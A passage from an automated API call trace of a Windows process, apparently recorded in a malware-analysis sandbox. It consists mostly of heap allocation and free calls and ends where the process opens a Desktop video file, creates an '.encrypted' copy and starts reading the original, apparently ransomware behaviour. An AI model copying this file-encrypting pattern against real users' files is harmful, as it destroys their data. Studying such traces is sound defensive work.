(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0032.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zuxz.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.388] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.388] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.388] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.388] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.388] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zuxz.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.391] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.391] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.392] ReadFile (in: hFile=0x128, lpBuffer=0x935008, 